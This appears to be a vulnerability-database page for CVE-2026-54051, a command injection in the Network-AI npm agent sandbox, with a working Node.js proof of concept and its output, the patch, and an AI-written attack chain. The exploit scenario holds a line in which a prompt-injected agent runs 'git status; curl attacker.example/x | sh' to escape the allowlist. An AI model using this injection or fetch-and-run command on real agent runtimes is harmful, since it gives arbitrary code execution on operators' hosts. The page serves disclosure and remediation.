Skip to main content

Network-AI CVE-2026-54051

CRITICAL
OS Command Injection (CWE-78)
2026-06-19 https://github.com/Jovancoding/Network-AI GHSA-qw6v-5fcf-5666
9.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

Exploitation requires an operator-granted wildcard allowlist and a caller authorized to invoke ShellExecutor, so AV:L and PR:L; sandbox escape to host process gives S:C with full C/I/A impact.

3.1 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 19, 2026 - 14:50 vuln.today
Analysis Generated
Jun 19, 2026 - 14:50 vuln.today
CVE Published
Jun 19, 2026 - 13:35 github-advisory
CRITICAL 9.9

DescriptionGitHub Advisory

Summary

The agent sandbox gates shell commands behind an allowlist (SandboxPolicy.isCommandAllowed), which THREAT_MODEL.md calls the main control against a compromised agent (Adversary 3.2). The allowlist glob-matches the whole command string, but ShellExecutor runs that string through /bin/sh -c. So any wildcard allow such as git *, npm * or node * also matches git status; <anything>, and a scoped command becomes arbitrary execution.

Root cause

Matching and execution disagree on what a command is. Lines pinned to 40e42d7 (lib/agent-runtime.ts is identical to the v5.8.5 tag).

  1. isCommandAllowed matches the full string, with no tokenizing and no metacharacter check:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L248-L260

  1. globMatch compiles * to .* and anchors it, so git * becomes ^git .*$ and matches git status; id:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L353-L360

  1. ShellExecutor.execute only checks isCommandAllowed, never requiresApproval:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L387-L391

  1. spawnCommand runs the approved string via /bin/sh -c, so ;, | and $(...) are interpreted by the shell:

https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L427-L431

Reachability

Any agent or caller allowed to run commands hits this when the operator allowlist has a wildcard entry. A plain git * is enough. No fresh-install precondition and no extra misconfiguration.

PoC

Installs network-ai@5.8.5, allows git *, then runs git status; id > marker. The allowlist accepts it and the injected id runs.

Run: npm i network-ai@5.8.5 && node poc-316.js

js
'use strict';
const os = require('os');
const fs = require('fs');
const path = require('path');
const { SandboxPolicy, ShellExecutor } = require('network-ai');

(async () => {
  const base = fs.mkdtempSync(path.join(os.tmpdir(), 'nai-poc-316-'));
  const marker = path.join(base, 'PWNED-316.txt');
  const policy = new SandboxPolicy({ basePath: base, allowedCommands: ['git *'] });
  const sh = new ShellExecutor(policy);

  const payload = `git status; id > ${marker}; echo INJECTED`;
  console.log('version:', require('network-ai/package.json').version);
  console.log('allowed:', policy.isCommandAllowed(payload));

  await sh.execute(payload);
  const ran = fs.existsSync(marker);
  console.log('injected id ran:', ran, ran ? fs.readFileSync(marker, 'utf8').trim() : '');
  console.log(ran ? 'VULNERABLE' : 'not reproduced');
  process.exit(ran ? 0 : 1);
})().catch(err => { console.error(err); process.exit(3); });

Output:

version: 5.8.5
allowed: true
injected id ran: true uid=501(alex) gid=20(staff) groups=20(staff),...
VULNERABLE

Impact

Arbitrary command execution as the orchestrator process. It defeats the one control meant to contain a compromised agent, so any agent with a single wildcard allow (git *, npm *, node *) can run anything. node * and npm * are direct code exec even without metacharacters.

Possible fix

Do not run agent commands through a shell. Parse to argv and spawn(file, args, { shell: false }), allowlist on the executable plus argument patterns, and reject shell metacharacters. Anchoring the regex alone is not enough; the whole-string match plus /bin/sh -c is the bug.

Patch

Fixed in v5.9.1 (commit 379f776). ShellExecutor now executes via spawn(file, args, { shell: false }) using a quote-aware parsed argv, so no shell is invoked. SandboxPolicy.isCommandAllowed and the new SandboxPolicy.tokenizeCommand reject any unquoted shell metacharacter (; & | $ ( ) < > { }` newline) or unterminated quote before the allowlist glob match; quoted metacharacters are preserved as literal argument data.

Remediation: upgrade to network-ai@5.9.1 or later. As defense in depth, avoid broad wildcard allowlist entries such as node * / npm * which are direct code execution by design.

AnalysisAI

Command injection in the Network-AI npm package (network-ai < 5.9.1) lets any agent or caller granted a wildcard allowlist entry such as git *, npm *, or node * execute arbitrary shell commands as the orchestrator process. The flaw stems from SandboxPolicy.isCommandAllowed glob-matching the entire command string while ShellExecutor runs it through /bin/sh -c, so shell metacharacters like ;, |, and $(...) smuggle additional commands past the sandbox. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Compromise or prompt-inject agent
Delivery
Craft command beginning with allowlisted prefix
Exploit
Append shell metacharacters and payload
Execution
SandboxPolicy.isCommandAllowed returns true
Persist
/bin/sh -c interprets injected statements
Impact
Arbitrary code execution as orchestrator process

Vulnerability AssessmentAI

Exploitation Requires (1) network-ai version < 5.9.1 installed and used as the agent runtime; (2) the operator-configured `SandboxPolicy.allowedCommands` list contains at least one wildcard glob entry such as `git *`, `npm *`, or `node *` - entries without trailing wildcards or with no metacharacter-sensitive prefix do not trigger the bug; (3) an agent or caller that can submit command strings to `ShellExecutor.execute`. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The reporter-assigned CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9) overstates exploitability for many deployments: AV:N assumes the agent input arrives over the network, but the vulnerable code path is reached only when an operator has already granted a wildcard allowlist entry and an agent or caller is permitted to submit commands, which is closer to a local/adjacent trust boundary. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An operator deploys network-ai 5.8.5 with an allowlist containing `git *` to let the agent perform repository operations. A prompt-injected or otherwise compromised agent submits `git status; curl attacker.example/x | sh`; `isCommandAllowed` returns true because the string starts with `git `, and `/bin/sh -c` executes both statements, giving the attacker arbitrary code execution as the orchestrator process. …
Remediation Vendor-released patch: network-ai 5.9.1. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit all Network-AI deployments to identify wildcard allowlist entries and affected versions (< 5.9.1). …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

CVE-2026-54051 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy